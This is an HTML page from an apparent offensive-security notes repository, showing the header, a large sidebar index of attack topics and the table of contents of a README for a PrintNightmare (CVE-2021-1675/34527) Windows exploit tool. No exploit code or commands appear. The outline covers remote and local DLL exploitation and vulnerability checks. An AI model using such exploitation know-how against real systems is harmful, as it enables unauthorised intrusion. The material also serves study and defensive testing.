stefan
/
husk
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity
husk/build/exploit/windows/print_nightmare/PrintNightmare/README.html

433 lines
68 KiB
HTML
Raw Blame History

<!doctype html>
<html lang="en">
<center>
<head>
<script src="https://cdn.jsdelivr.net/npm/fuse.js/dist/fuse.js"></script>
<script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
<script type="text/javascript" src="/static/js/auto-complete.js"></script>
<script type="text/javascript" src="/static/js/lunr.min.js"></script>
<script type="text/javascript" src="/static/js/search.js"></script>
<link rel="stylesheet" href="/static/stylesheet.css">
<link rel="stylesheet" href="/static/auto-complete.css">
<br>
<title>The Real Hugo</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
</head>
<body>
<!-- topmenu -->
<div class="menu">
<a href="/" style="text-decoration:none">Husk</a>
</div>
<div class="search-container">
<label for="search-by"><i class="fas fa-search"></i></label>
<input data-search-input="" id="search-by" type="search" placeholder="Search..." autocomplete="off">
<!--button type="submit"><i class="search"></i>&#128269;</button>-->
<span data-search-clear=""><i class="fas fa-times"></i></span>
</div>
</div>
<div class="menu">
</div>
<!--br><br-->
</center>
<p></p>
<div class="columns">
<!-- Sidebar -->
<div class="column column-1">
<ul><details id=enumeration ontoggle="linkClick(this); return false;" ><summary>Enumeration</summary><ul><details id=containers ontoggle="linkClick(this); return false;" ><summary>Containers</summary><ul></ul></details><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/enumeration/docs/aws.html">aws</a></li><li><a href="/enumeration/docs/cewl.html">cewl</a></li><li><a href="/enumeration/docs/dns.html">dns</a></li><li><a href="/enumeration/docs/docker_enumeration.html">docker_enumeration</a></li><li><a href="/enumeration/docs/ffuf.html">ffuf</a></li><li><a href="/enumeration/docs/gobuster.html">gobuster</a></li><li><a href="/enumeration/docs/kerberoast.html">kerberoast</a></li><li><a href="/enumeration/docs/kubectl.html">kubectl</a></li><li><a href="/enumeration/docs/ldap.html">ldap</a></li><li><a href="/enumeration/docs/linux_basics.html">linux_basics</a></li><li><a href="/enumeration/docs/microk8s.html">microk8s</a></li><li><a href="/enumeration/docs/nfs.html">nfs</a></li><li><a href="/enumeration/docs/nikto.html">nikto</a></li><li><a href="/enumeration/docs/nmap.html">nmap</a></li><li><a href="/enumeration/docs/port_knocking.html">port_knocking</a></li><li><a href="/enumeration/docs/rpcclient.html">rpcclient</a></li><li><a href="/enumeration/docs/rsync.html">rsync</a></li><li><a href="/enumeration/docs/rustscan.html">rustscan</a></li><li><a href="/enumeration/docs/shodan.html">shodan</a></li><details id=snmp ontoggle="linkClick(this); return false;" ><summary>Snmp</summary><ul><li><a href="/enumeration/docs/snmp/onesixtyone.html">onesixtyone</a></li><li><a href="/enumeration/docs/snmp/snmpcheck.html">snmpcheck</a></li></ul></details><li><a href="/enumeration/docs/websites.html">websites</a></li><li><a href="/enumeration/docs/wfuzz.html">wfuzz</a></li><li><a href="/enumeration/docs/wpscan.html">wpscan</a></li></ul></details><details id=network_scanners ontoggle="linkClick(this); return false;" ><summary>Network_scanners</summary><ul></ul></details><details id=windows ontoggle="linkClick(this); return false;" ><summary>Windows</summary><ul><li><a href="/enumeration/windows/bloodhound.html">bloodhound</a></li><li><a href="/enumeration/windows/event_log.html">event_log</a></li><li><a href="/enumeration/windows/manual_enum.html">manual_enum</a></li><li><a href="/enumeration/windows/powershell.html">powershell</a></li><li><a href="/enumeration/windows/rpcclient.html">rpcclient</a></li><li><a href="/enumeration/windows/sysinternals.html">sysinternals</a></li><li><a href="/enumeration/windows/sysmon.html">sysmon</a></li><li><a href="/enumeration/windows/vss.html">vss</a></li></ul></details></ul></details><details id=exploit ontoggle="linkClick(this); return false;" ><summary>Exploit</summary><ul><details id=CPUs ontoggle="linkClick(this); return false;" ><summary>CPUs</summary><ul><li><a href="/exploit/CPUs/meltdown.html">meltdown</a></li></ul></details><details id=binaries ontoggle="linkClick(this); return false;" ><summary>Binaries</summary><ul><li><a href="/exploit/binaries/Shellcode.html">Shellcode</a></li><li><a href="/exploit/binaries/aslr.html">aslr</a></li><details id=buffer_overflow ontoggle="linkClick(this); return false;" ><summary>Buffer_overflow</summary><ul><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/exploit/binaries/buffer_overflow/docs/amd64.html">amd64</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/amd64_instructions.html">amd64_instructions</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/buffer_overflow.html">buffer_overflow</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/cut_stack_in_half.html">cut_stack_in_half</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/pwntools_specifics.html">pwntools_specifics</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/ret_address_reuse.html">ret_address_reuse</a></li></ul></details><li><a href="/exploit/binaries/buffer_overflow/ropping.html">ropping</a></li></ul></details><details id=canary_bypass ontoggle="linkClick(this); return false;" ><summary>Canary_bypass</summary><ul><li><a href="/exploit/binaries/canary_bypass/canary_bypass.html">canary_bypass</a></li></ul></details><details id=format_string ontoggle="linkClick(this); return false;" ><summary>Format_string</summary><ul><li><a href="/exploit/binaries/format_string/format_string.html">format_string</a></li></ul></details><details id=integral_promotion ontoggle="linkClick(this); return false;" ><summary>Integral_promotion</summary><ul><li><a href="/exploit/binaries/integral_promotion/integral_promotion.html">integral_promotion</a></li></ul></details><li><a href="/exploit/binaries/plt_got.html">plt_got</a></li><li><a href="/exploit/binaries/r2.html">r2</a></li><li><a href="/exploit/binaries/ret2libc.html">ret2libc</a></li></ul></details><details id=dns ontoggle="linkClick(this); return false;" ><summary>Dns</summary><ul><li><a href="/exploit/dns/zone_transfer.html">zone_transfer</a></li></ul></details><details id=hashes ontoggle="linkClick(this); return false;" ><summary>Hashes</summary><ul><li><a href="/exploit/hashes/collision.html">collision</a></li></ul></details><details id=imagemagick ontoggle="linkClick(this); return false;" ><summary>Imagemagick</summary><ul><li><a href="/exploit/imagemagick/imagetragick.html">imagetragick</a></li></ul></details><details id=java ontoggle="linkClick(this); return false;" ><summary>Java</summary><ul><details id=OGNL ontoggle="linkClick(this); return false;" ><summary>OGNL</summary><ul><li><a href="/exploit/java/OGNL/cve_2022_26134.html">cve_2022_26134</a></li></ul></details><li><a href="/exploit/java/ghidra_debug.html">ghidra_debug</a></li><li><a href="/exploit/java/ghostcat.html">ghostcat</a></li><li><a href="/exploit/java/log4shell.html">log4shell</a></li><li><a href="/exploit/java/spring4shell.html">spring4shell</a></li></ul></details><details id=level3_hypervisor ontoggle="linkClick(this); return false;" ><summary>Level3_hypervisor</summary><ul><details id=docker_sec ontoggle="linkClick(this); return false;" ><summary>Docker_sec</summary><ul><li><a href="/exploit/level3_hypervisor/docker_sec/docker.html">docker</a></li></ul></details><li><a href="/exploit/level3_hypervisor/kubernetes.html">kubernetes</a></li><li><a href="/exploit/level3_hypervisor/lxc.html">lxc</a></li><li><a href="/exploit/level3_hypervisor/microk8s.html">microk8s</a></li></ul></details><details id=linux ontoggle="linkClick(this); return false;" ><summary>Linux</summary><ul><li><a href="/exploit/linux/capabilities.html">capabilities</a></li><details id=dirty_pipe ontoggle="linkClick(this); return false;" ><summary>Dirty_pipe</summary><ul><li><a href="/exploit/linux/dirty_pipe/dirty_pipe.html">dirty_pipe</a></li></ul></details><li><a href="/exploit/linux/exiftool.html">exiftool</a></li><li><a href="/exploit/linux/groups.html">groups</a></li><li><a href="/exploit/linux/ld_preload.html">ld_preload</a></li><li><a href="/exploit/linux/nfs_rootsquash.html">nfs_rootsquash</a></li><li><a href="/exploit/linux/overlayfs.html">overlayfs</a></li><details id=pkexec ontoggle="linkClick(this); return false;" ><summary>Pkexec</summary><ul><li><a href="/exploit/linux/pkexec/CVE_2021_4034.html">CVE_2021_4034</a></li></ul></details><li><a href="/exploit/linux/polkit.html">polkit</a></li><li><a href="/exploit/linux/racing_conditions.html">racing_conditions</a></li><li><a href="/exploit/linux/setcap.html">setcap</a></li><li><a href="/exploit/linux/shared_object_injection.html">shared_object_injection</a></li><li><a href="/exploit/linux/shell_shock.html">shell_shock</a></li><details id=sudo ontoggle="linkClick(this); return false;" ><summary>Sudo</summary><ul><li><a href="/exploit/linux/sudo/CVE_2019_14287.html">CVE_2019_14287</a></li><li><a href="/exploit/linux/sudo/CVE_2019_18634.html">CVE_2019_18634</a></li><li><a href="/exploit/linux/sudo/baron_samedit.html">baron_samedit</a></li><li><a href="/exploit/linux/sudo/tokens.html">tokens</a></li></ul></details><li><a href="/exploit/linux/wildard_exploitation.html">wildard_exploitation</a></li></ul></details><details id=macOS ontoggle="linkClick(this); return false;" ><summary>MacOS</summary><ul></ul></details><details id=network ontoggle="linkClick(this); return false;" ><summary>Network</summary><ul><li><a href="/exploit/network/mac_spoofing.html">mac_spoofing</a></li></ul></details><details id=padding ontoggle="linkClick(this); return false;" ><summary>Padding</summary><ul><li><a href="/exploit/padding/padbuster.html">padbuster</a></li></ul></details><details id=python ontoggle="linkClick(this); return false;" ><summary>Python</summary><ul><li><a href="/exploit/python/code_injection.html">code_injection</a></li><li><a href="/exploit/python/jail_escape.html">jail_escape</a></li><li><a href="/exploit/python/lib_hijack.html">lib_hijack</a></li><li><a href="/exploit/python/pickle.html">pickle</a></li><li><a href="/exploit/python/pwntools.html">pwntools</a></li><li><a href="/exploit/python/pyc.html">pyc</a></li><li><a href="/exploit/python/scapy.html">scapy</a></li></ul></details><details id=samba ontoggle="linkClick(this); return false;" ><summary>Samba</summary><ul><li><a href="/exploit/samba/smbmap.html">smbmap</a></li></ul></details><details id=sqli ontoggle="linkClick(this); return false;" ><summary>Sqli</summary><ul><li><a href="/exploit/sqli/mssql.html">mssql</a></li><li><a href="/exploit/sqli/no_sqli.html">no_sqli</a></li><li><a href="/exploit/sqli/sqli.html">sqli</a></li><li><a href="/exploit/sqli/sqlmap.html">sqlmap</a></li></ul></details><details id=ssl_tls ontoggle="linkClick(this); return false;" ><summary>Ssl_tls</summary><ul><li><a href="/exploit/ssl_tls/heartbleed.html">heartbleed</a></li></ul></details><details id=web ontoggle="linkClick(this); return false;" ><summary>Web</summary><ul><details id=bypass_rate_limiting ontoggle="linkClick(this); return false;" ><summary>Bypass_rate_limiting</summary><ul><li><a href="/exploit/web/bypass_rate_limiting/bypass_rate_limiting.html">bypass_rate_limiting</a></li></ul></details><li><a href="/exploit/web/command_injection.html">command_injection</a></li><details id=content_security_policy ontoggle="linkClick(this); return false;" ><summary>Content_security_policy</summary><ul><li><a href="/exploit/web/content_security_policy/content_security_policy.html">content_security_policy</a></li></ul></details><li><a href="/exploit/web/cookie_tampering.html">cookie_tampering</a></li><li><a href="/exploit/web/csrf.html">csrf</a></li><details id=forced_browsing ontoggle="linkClick(this); return false;" ><summary>Forced_browsing</summary><ul><li><a href="/exploit/web/forced_browsing/forced_browsing.html">forced_browsing</a></li></ul></details><li><a href="/exploit/web/http_header_injection.html">http_header_injection</a></li><details id=idor ontoggle="linkClick(this); return false;" ><summary>Idor</summary><ul><li><a href="/exploit/web/idor/idor.html">idor</a></li></ul></details><details id=javascript ontoggle="linkClick(this); return false;" ><summary>Javascript</summary><ul><li><a href="/exploit/web/javascript/bypass_filters.html">bypass_filters</a></li><li><a href="/exploit/web/javascript/prototype_pollution.html">prototype_pollution</a></li></ul></details><details id=jwt ontoggle="linkClick(this); return false;" ><summary>Jwt</summary><ul><li><a href="/exploit/web/jwt/jwt.html">jwt</a></li></ul></details><li><a href="/exploit/web/local_file_inclusion.html">local_file_inclusion</a></li><li><a href="/exploit/web/methodology.html">methodology</a></li><details id=nodejs ontoggle="linkClick(this); return false;" ><summary>Nodejs</summary><ul><li><a href="/exploit/web/nodejs/deserialization.html">deserialization</a></li></ul></details><details id=php ontoggle="linkClick(this); return false;" ><summary>Php</summary><ul><li><a href="/exploit/web/php/command_injection.html">command_injection</a></li><li><a href="/exploit/web/php/password_reset.html">password_reset</a></li><li><a href="/exploit/web/php/php_base64_filter.html">php_base64_filter</a></li><li><a href="/exploit/web/php/php_image_exif.html">php_image_exif</a></li><li><a href="/exploit/web/php/php_user_agent_rce.html">php_user_agent_rce</a></li><li><a href="/exploit/web/php/preload_lib.html">preload_lib</a></li><li><a href="/exploit/web/php/unserialize.html">unserialize</a></li></ul></details><li><a href="/exploit/web/re_registration.html">re_registration</a></li><li><a href="/exploit/web/remote_file_inclusion.html">remote_file_inclusion</a></li><details id=ssrf ontoggle="linkClick(this); return false;" ><summary>Ssrf</summary><ul><li><a href="/exploit/web/ssrf/iframe.html">iframe</a></li><li><a href="/exploit/web/ssrf/ssrf.html">ssrf</a></li></ul></details><details id=ssti ontoggle="linkClick(this); return false;" ><summary>Ssti</summary><ul><li><a href="/exploit/web/ssti/ssti.html">ssti</a></li></ul></details><li><a href="/exploit/web/url_forgery.html">url_forgery</a></li><li><a href="/exploit/web/wordpress.html">wordpress</a></li><li><a href="/exploit/web/xpath.html">xpath</a></li><li><a href="/exploit/web/xss.html">xss</a></li><details id=xxe ontoggle="linkClick(this); return false;" ><summary>Xxe</summary><ul><li><a href="/exploit/web/xxe/wp_xxe_.html">wp_xxe_</a></li><li><a href="/exploit/web/xxe/xml_external_entity.html">xml_external_entity</a></li></ul></details></ul></details><details id=windows ontoggle="linkClick(this); return false;" ><summary>Windows</summary><ul><details id=Portable Executables ontoggle="linkClick(this); return false;" ><summary>Portable Executables</summary><ul><li><a href="/exploit/windows/Portable Executables/Shellcode.html">Shellcode</a></li></ul></details><details id=dll_hijacking ontoggle="linkClick(this); return false;" ><summary>Dll_hijacking</summary><ul><li><a href="/exploit/windows/dll_hijacking/dll_hijacking.html">dll_hijacking</a></li></ul></details><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/exploit/windows/docs/always_installed_elevated.html">always_installed_elevated</a></li><li><a href="/exploit/windows/docs/crackmapexec.html">crackmapexec</a></li><li><a href="/exploit/windows/docs/dpapi.html">dpapi</a></li><li><a href="/exploit/windows/docs/impacket.html">impacket</a></li><li><a href="/exploit/windows/docs/llmnr.html">llmnr</a></li><li><a href="/exploit/windows/docs/lnk_exploit.html">lnk_exploit</a></li><li><a href="/exploit/windows/docs/pass_the_hash.html">pass_the_hash</a></li><li><a href="/exploit/windows/docs/password_in_registry.html">password_in_registry</a></li><li><a href="/exploit/windows/docs/potatoes.html">potatoes</a></li><li><a href="/exploit/windows/docs/printnightmare.html">printnightmare</a></li><li><a href="/exploit/windows/docs/responder.html">responder</a></li><li><a href="/exploit/windows/docs/unquoted_path.html">unquoted_path</a></li></ul></details><details id=macros ontoggle="linkClick(this); return false;" ><summary>Macros</summary><ul><li><a href="/exploit/windows/macros/macros.html">macros</a></li></ul></details><details id=payloads ontoggle="linkClick(this); return false;" ><summary>Payloads</summary><ul><li><a href="/exploit/windows/payloads/windows_scripting_host.html">windows_scripting_host</a></li></ul></details><details id=print_nightmare ontoggle="linkClick(this); return false;" ><summary>Print_nightmare</summary><ul><details id=CVE-2021-1675 ontoggle="linkClick(this); return false;" ><summary>CVE-2021-1675</summary><ul><details id=nightmare-dll ontoggle="linkClick(this); return false;" ><summary>Nightmare-dll</summary><ul></ul></details></ul></details><li><a href="/exploit/windows/print_nightmare/print_nightmare.html">print_nightmare</a></li></ul></details><details id=process_injection ontoggle="linkClick(this); return false;" ><summary>Process_injection</summary><ul><li><a href="/exploit/windows/process_injection/dll_injection.html">dll_injection</a></li><li><a href="/exploit/windows/process_injection/process_hollowing.html">process_hollowing</a></li><li><a href="/exploit/windows/process_injection/shellcode_injection.html">shellcode_injection</a></li><li><a href="/exploit/windows/process_injection/thread_hijacking.html">thread_hijacking</a></li></ul></details><details id=service_escalation ontoggle="linkClick(this); return false;" ><summary>Service_escalation</summary><ul><li><a href="/exploit/windows/service_escalation/service_escalation.html">service_escalation</a></li></ul></details><details id=zero_logon ontoggle="linkClick(this); return false;" ><summary>Zero_logon</summary><ul><li><a href="/exploit/windows/zero_logon/zero_logon.html">zero_logon</a></li></ul></details></ul></details><details id=yaml ontoggle="linkClick(this); return false;" ><summary>Yaml</summary><ul><li><a href="/exploit/yaml/deserialization.html">deserialization</a></li></ul></details></ul></details><details id=forensics ontoggle="linkClick(this); return false;" ><summary>Forensics</summary><ul><li><a href="/forensics/ios.html">ios</a></li><li><a href="/forensics/kape.html">kape</a></li><li><a href="/forensics/ntfs.html">ntfs</a></li><li><a href="/forensics/oletools.html">oletools</a></li><li><a href="/forensics/volatility.html">volatility</a></li><li><a href="/forensics/windows_registry.html">windows_registry</a></li></ul></details><details id=hashes ontoggle="linkClick(this); return false;" ><summary>Hashes</summary><ul><details id=bruteforce ontoggle="linkClick(this); return false;" ><summary>Bruteforce</summary><ul><li><a href="/hashes/bruteforce/patator.html">patator</a></li></ul></details><li><a href="/hashes/generate_wordlists.html">generate_wordlists</a></li><li><a href="/hashes/haiti.html">haiti</a></li><li><a href="/hashes/hashcat_utils.html">hashcat_utils</a></li><details id=password_cracking ontoggle="linkClick(this); return false;" ><summary>Password_cracking</summary><ul><li><a href="/hashes/password_cracking/hydra.html">hydra</a></li><li><a href="/hashes/password_cracking/john.html">john</a></li><li><a href="/hashes/password_cracking/smb_challenge.html">smb_challenge</a></li><li><a href="/hashes/password_cracking/sucrack.html">sucrack</a></li><li><a href="/hashes/password_cracking/vnc.html">vnc</a></li></ul></details><details id=password_guessing ontoggle="linkClick(this); return false;" ><summary>Password_guessing</summary><ul><li><a href="/hashes/password_guessing/standard_passwords.html">standard_passwords</a></li></ul></details></ul></details><details id=persistence ontoggle="linkClick(this); return false;" ><summary>Persistence</summary><ul><li><a href="/persistence/bashrc.html">bashrc</a></li><li><a href="/persistence/crontab.html">crontab</a></li><li><a href="/persistence/meterpreter.html">meterpreter</a></li><li><a href="/persistence/persistence.html">persistence</a></li><li><a href="/persistence/wmi.html">wmi</a></li></ul></details><details id=post exploitation ontoggle="linkClick(this); return false;" ><summary>Post exploitation</summary><ul><details id=Seatbelt ontoggle="linkClick(this); return false;" ><summary>Seatbelt</summary><ul><details id=.github ontoggle="linkClick(this); return false;" ><summary>.github</summary><ul><details id=ISSUE_TEMPLATE ontoggle="linkClick(this); return false;" ><summary>ISSUE_TEMPLATE</summary><ul><li><a href="/post exploitation/Seatbelt/.github/ISSUE_TEMPLATE/bug_report.html">bug_report</a></li><li><a href="/post exploitation/Seatbelt/.github/ISSUE_TEMPLATE/feature_request.html">feature_request</a></li></ul></details></ul></details><li><a href="/post exploitation/Seatbelt/CHANGELOG.html">CHANGELOG</a></li><details id=Seatbelt ontoggle="linkClick(this); return false;" ><summary>Seatbelt</summary><ul><details id=Commands ontoggle="linkClick(this); return false;" ><summary>Commands</summary><ul><details id=Windows ontoggle="linkClick(this); return false;" ><summary>Windows</summary><ul><details id=EventLogs ontoggle="linkClick(this); return false;" ><summary>EventLogs</summary><ul></ul></details></ul></details></ul></details><details id=Output ontoggle="linkClick(this); return false;" ><summary>Output</summary><ul></ul></details></ul></details></ul></details><details id=bc_security ontoggle="linkClick(this); return false;" ><summary>Bc_security</summary><ul></ul></details><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/post exploitation/docs/c2.html">c2</a></li><li><a href="/post exploitation/docs/crackmapexec.html">crackmapexec</a></li><li><a href="/post exploitation/docs/empire.html">empire</a></li><li><a href="/post exploitation/docs/ids_ips_evation.html">ids_ips_evation</a></li><li><a href="/post exploitation/docs/linux.html">linux</a></li><li><a href="/post exploitation/docs/metasploit.html">metasploit</a></li><li><a href="/post exploitation/docs/mimikatz.html">mimikatz</a></li><li><a href="/post exploitation/docs/mitm.html">mitm</a></li><li><a href="/post exploitation/docs/nfs_root_squash.html">nfs_root_squash</a></li><li><a href="/post exploitation/docs/powershell.html">powershell</a></li><li><a href="/post exploitation/docs/secretsdump.html">secretsdump</a></li><details id=windows ontoggle="linkClick(this); return false;" ><summary>Windows</summary><ul><li><a href="/post exploitation/docs/windows/Signature-Evasion.html">Signature-Evasion</a></li><li><a href="/post exploitation/docs/windows/antivirus_evasion.html">antivirus_evasion</a></li><li><a href="/post exploitation/docs/windows/applocker.html">applocker</a></li><li><a href="/post exploitation/docs/windows/evade_event_tracing.html">evade_event_tracing</a></li><li><a href="/post exploitation/docs/windows/living_off_the_land.html">living_off_the_land</a></li><li><a href="/post exploitation/docs/windows/pass_the_hash.html">pass_the_hash</a></li><li><a href="/post exploitation/docs/windows/powershell_logs.html">powershell_logs</a></li><li><a href="/post exploitation/docs/windows/registry.html">registry</a></li><li><a href="/post exploitation/docs/windows/sebackupprivilege.html">sebackupprivilege</a></li><li><a href="/post exploitation/docs/windows/user_account_control.html">user_account_control</a></li></ul></details></ul></details><li><a href="/post exploitation/pivoting.html">pivoting</a></li><details id=priv_esc ontoggle="linkClick(this); return false;" ><summary>Priv_esc</summary><ul><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/post exploitation/priv_esc/docs/linux_priv_esc.html">linux_priv_esc</a></li><li><a href="/post exploitation/priv_esc/docs/pspy.html">pspy</a></li><details id=windows ontoggle="linkClick(this); return false;" ><summary>Windows</summary><ul><li><a href="/post exploitation/priv_esc/docs/windows/add_user.html">add_user</a></li><li><a href="/post exploitation/priv_esc/docs/windows/windows_priv_esc.html">windows_priv_esc</a></li></ul></details></ul></details><details id=kernel-exploits ontoggle="linkClick(this); return false;" ><summary>Kernel-exploits</summary><ul></ul></details><details id=privesc-scripts ontoggle="linkClick(this); return false;" ><summary>Privesc-scripts</summary><ul><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/post exploitation/priv_esc/privesc-scripts/docs/get_script_onto_target.html">get_script_onto_target</a></li></ul></details></ul></details><details id=suid ontoggle="linkClick(this); return false;" ><summary>Suid</summary><ul></ul></details></ul></details></ul></details><details id=reverse engineering ontoggle="linkClick(this); return false;" ><summary>Reverse engineering</summary><ul><details id=android ontoggle="linkClick(this); return false;" ><summary>Android</summary><ul><li><a href="/reverse engineering/android/misc.html">misc</a></li></ul></details><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/reverse engineering/docs/deobfuscation.html">deobfuscation</a></li><li><a href="/reverse engineering/docs/dll_reversing.html">dll_reversing</a></li><li><a href="/reverse engineering/docs/firmware.html">firmware</a></li><li><a href="/reverse engineering/docs/function_mangling.html">function_mangling</a></li><li><a href="/reverse engineering/docs/scada.html">scada</a></li></ul></details><details id=java ontoggle="linkClick(this); return false;" ><summary>Java</summary><ul><li><a href="/reverse engineering/java/krakatau.html">krakatau</a></li></ul></details><details id=windows ontoggle="linkClick(this); return false;" ><summary>Windows</summary><ul><li><a href="/reverse engineering/windows/portable-executable.html">portable-executable</a></li></ul></details></ul></details><details id=reverse shells ontoggle="linkClick(this); return false;" ><summary>Reverse shells</summary><ul><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/reverse shells/docs/evil-winrm.html">evil-winrm</a></li><li><a href="/reverse shells/docs/msfconsole.html">msfconsole</a></li><li><a href="/reverse shells/docs/msfvenom.html">msfvenom</a></li><li><a href="/reverse shells/docs/netcat.html">netcat</a></li><li><a href="/reverse shells/docs/powershell.html">powershell</a></li><li><a href="/reverse shells/docs/shell_upgrade.html">shell_upgrade</a></li><li><a href="/reverse shells/docs/socat.html">socat</a></li><li><a href="/reverse shells/docs/webshell.html">webshell</a></li></ul></details><li><a href="/reverse shells/firewalls.html">firewalls</a></li><details id=windows ontoggle="linkClick(this); return false;" ><summary>Windows</summary><ul></ul></details></ul></details>
</ul>
</div>
<div class="column column-2">
<span class="body">
<style>pre { line-height: 125%; }
td.linenos .normal { color: #37474F; background-color: #263238; padding-left: 5px; padding-right: 5px; }
span.linenos { color: #37474F; background-color: #263238; padding-left: 5px; padding-right: 5px; }
td.linenos .special { color: #607A86; background-color: #263238; padding-left: 5px; padding-right: 5px; }
span.linenos.special { color: #607A86; background-color: #263238; padding-left: 5px; padding-right: 5px; }
.codehilite .hll { background-color: #2C3B41 }
.codehilite .c { color: #546E7A; font-style: italic } /* Comment */
.codehilite .err { color: #FF5370 } /* Error */
.codehilite .esc { color: #89DDFF } /* Escape */
.codehilite .g { color: #EEFFFF } /* Generic */
.codehilite .k { color: #BB80B3 } /* Keyword */
.codehilite .l { color: #C3E88D } /* Literal */
.codehilite .n { color: #EEFFFF } /* Name */
.codehilite .o { color: #89DDFF } /* Operator */
.codehilite .p { color: #89DDFF } /* Punctuation */
.codehilite .ch { color: #546E7A; font-style: italic } /* Comment.Hashbang */
.codehilite .cm { color: #546E7A; font-style: italic } /* Comment.Multiline */
.codehilite .cp { color: #546E7A; font-style: italic } /* Comment.Preproc */
.codehilite .cpf { color: #546E7A; font-style: italic } /* Comment.PreprocFile */
.codehilite .c1 { color: #546E7A; font-style: italic } /* Comment.Single */
.codehilite .cs { color: #546E7A; font-style: italic } /* Comment.Special */
.codehilite .gd { color: #FF5370 } /* Generic.Deleted */
.codehilite .ge { color: #89DDFF } /* Generic.Emph */
.codehilite .gr { color: #FF5370 } /* Generic.Error */
.codehilite .gh { color: #C3E88D } /* Generic.Heading */
.codehilite .gi { color: #C3E88D } /* Generic.Inserted */
.codehilite .go { color: #546E7A } /* Generic.Output */
.codehilite .gp { color: #FFCB6B } /* Generic.Prompt */
.codehilite .gs { color: #FF5370 } /* Generic.Strong */
.codehilite .gu { color: #89DDFF } /* Generic.Subheading */
.codehilite .gt { color: #FF5370 } /* Generic.Traceback */
.codehilite .kc { color: #89DDFF } /* Keyword.Constant */
.codehilite .kd { color: #BB80B3 } /* Keyword.Declaration */
.codehilite .kn { color: #89DDFF; font-style: italic } /* Keyword.Namespace */
.codehilite .kp { color: #89DDFF } /* Keyword.Pseudo */
.codehilite .kr { color: #BB80B3 } /* Keyword.Reserved */
.codehilite .kt { color: #BB80B3 } /* Keyword.Type */
.codehilite .ld { color: #C3E88D } /* Literal.Date */
.codehilite .m { color: #F78C6C } /* Literal.Number */
.codehilite .s { color: #C3E88D } /* Literal.String */
.codehilite .na { color: #BB80B3 } /* Name.Attribute */
.codehilite .nb { color: #82AAFF } /* Name.Builtin */
.codehilite .nc { color: #FFCB6B } /* Name.Class */
.codehilite .no { color: #EEFFFF } /* Name.Constant */
.codehilite .nd { color: #82AAFF } /* Name.Decorator */
.codehilite .ni { color: #89DDFF } /* Name.Entity */
.codehilite .ne { color: #FFCB6B } /* Name.Exception */
.codehilite .nf { color: #82AAFF } /* Name.Function */
.codehilite .nl { color: #82AAFF } /* Name.Label */
.codehilite .nn { color: #FFCB6B } /* Name.Namespace */
.codehilite .nx { color: #EEFFFF } /* Name.Other */
.codehilite .py { color: #FFCB6B } /* Name.Property */
.codehilite .nt { color: #FF5370 } /* Name.Tag */
.codehilite .nv { color: #89DDFF } /* Name.Variable */
.codehilite .ow { color: #89DDFF; font-style: italic } /* Operator.Word */
.codehilite .w { color: #EEFFFF } /* Text.Whitespace */
.codehilite .mb { color: #F78C6C } /* Literal.Number.Bin */
.codehilite .mf { color: #F78C6C } /* Literal.Number.Float */
.codehilite .mh { color: #F78C6C } /* Literal.Number.Hex */
.codehilite .mi { color: #F78C6C } /* Literal.Number.Integer */
.codehilite .mo { color: #F78C6C } /* Literal.Number.Oct */
.codehilite .sa { color: #BB80B3 } /* Literal.String.Affix */
.codehilite .sb { color: #C3E88D } /* Literal.String.Backtick */
.codehilite .sc { color: #C3E88D } /* Literal.String.Char */
.codehilite .dl { color: #EEFFFF } /* Literal.String.Delimiter */
.codehilite .sd { color: #546E7A; font-style: italic } /* Literal.String.Doc */
.codehilite .s2 { color: #C3E88D } /* Literal.String.Double */
.codehilite .se { color: #EEFFFF } /* Literal.String.Escape */
.codehilite .sh { color: #C3E88D } /* Literal.String.Heredoc */
.codehilite .si { color: #89DDFF } /* Literal.String.Interpol */
.codehilite .sx { color: #C3E88D } /* Literal.String.Other */
.codehilite .sr { color: #89DDFF } /* Literal.String.Regex */
.codehilite .s1 { color: #C3E88D } /* Literal.String.Single */
.codehilite .ss { color: #89DDFF } /* Literal.String.Symbol */
.codehilite .bp { color: #89DDFF } /* Name.Builtin.Pseudo */
.codehilite .fm { color: #82AAFF } /* Name.Function.Magic */
.codehilite .vc { color: #89DDFF } /* Name.Variable.Class */
.codehilite .vg { color: #89DDFF } /* Name.Variable.Global */
.codehilite .vi { color: #89DDFF } /* Name.Variable.Instance */
.codehilite .vm { color: #82AAFF } /* Name.Variable.Magic */
.codehilite .il { color: #F78C6C } /* Literal.Number.Integer.Long */</style>
<div class="column column-3">
<ul>
<li><a href="#printnightmare">PrintNightmare</a><ul>
<li><a href="#installtion">Installtion</a></li>
<li><a href="#usage">Usage</a><ul>
<li><a href="#examples">Examples</a><ul>
<li><a href="#exploitation">Exploitation</a><ul>
<li><a href="#remote-dll">Remote DLL</a></li>
<li><a href="#local-dll">Local DLL</a></li>
<li><a href="#custom-name">Custom name</a></li>
</ul>
</li>
<li><a href="#check-if-target-is-vulnerable">Check if target is vulnerable</a><ul>
<li><a href="#unpatched-windows-10">Unpatched Windows 10</a></li>
<li><a href="#patched-windows-server-2022">Patched Windows Server 2022</a></li>
</ul>
</li>
<li><a href="#list-current-printer-drivers">List current printer drivers</a></li>
<li><a href="#delete-printer-driver">Delete printer driver</a></li>
</ul>
</li>
</ul>
</li>
<li><a href="#details">Details</a><ul>
<li><a href="#cve-2021-1675">CVE-2021-1675</a></li>
<li><a href="#cve-2021-34527">CVE-2021-34527</a></li>
<li><a href="#combining-the-pieces">Combining the pieces</a><ul>
<li><a href="#smb-and-unc">SMB and UNC</a></li>
</ul>
</li>
</ul>
</li>
<li><a href="#authors">Authors</a></li>
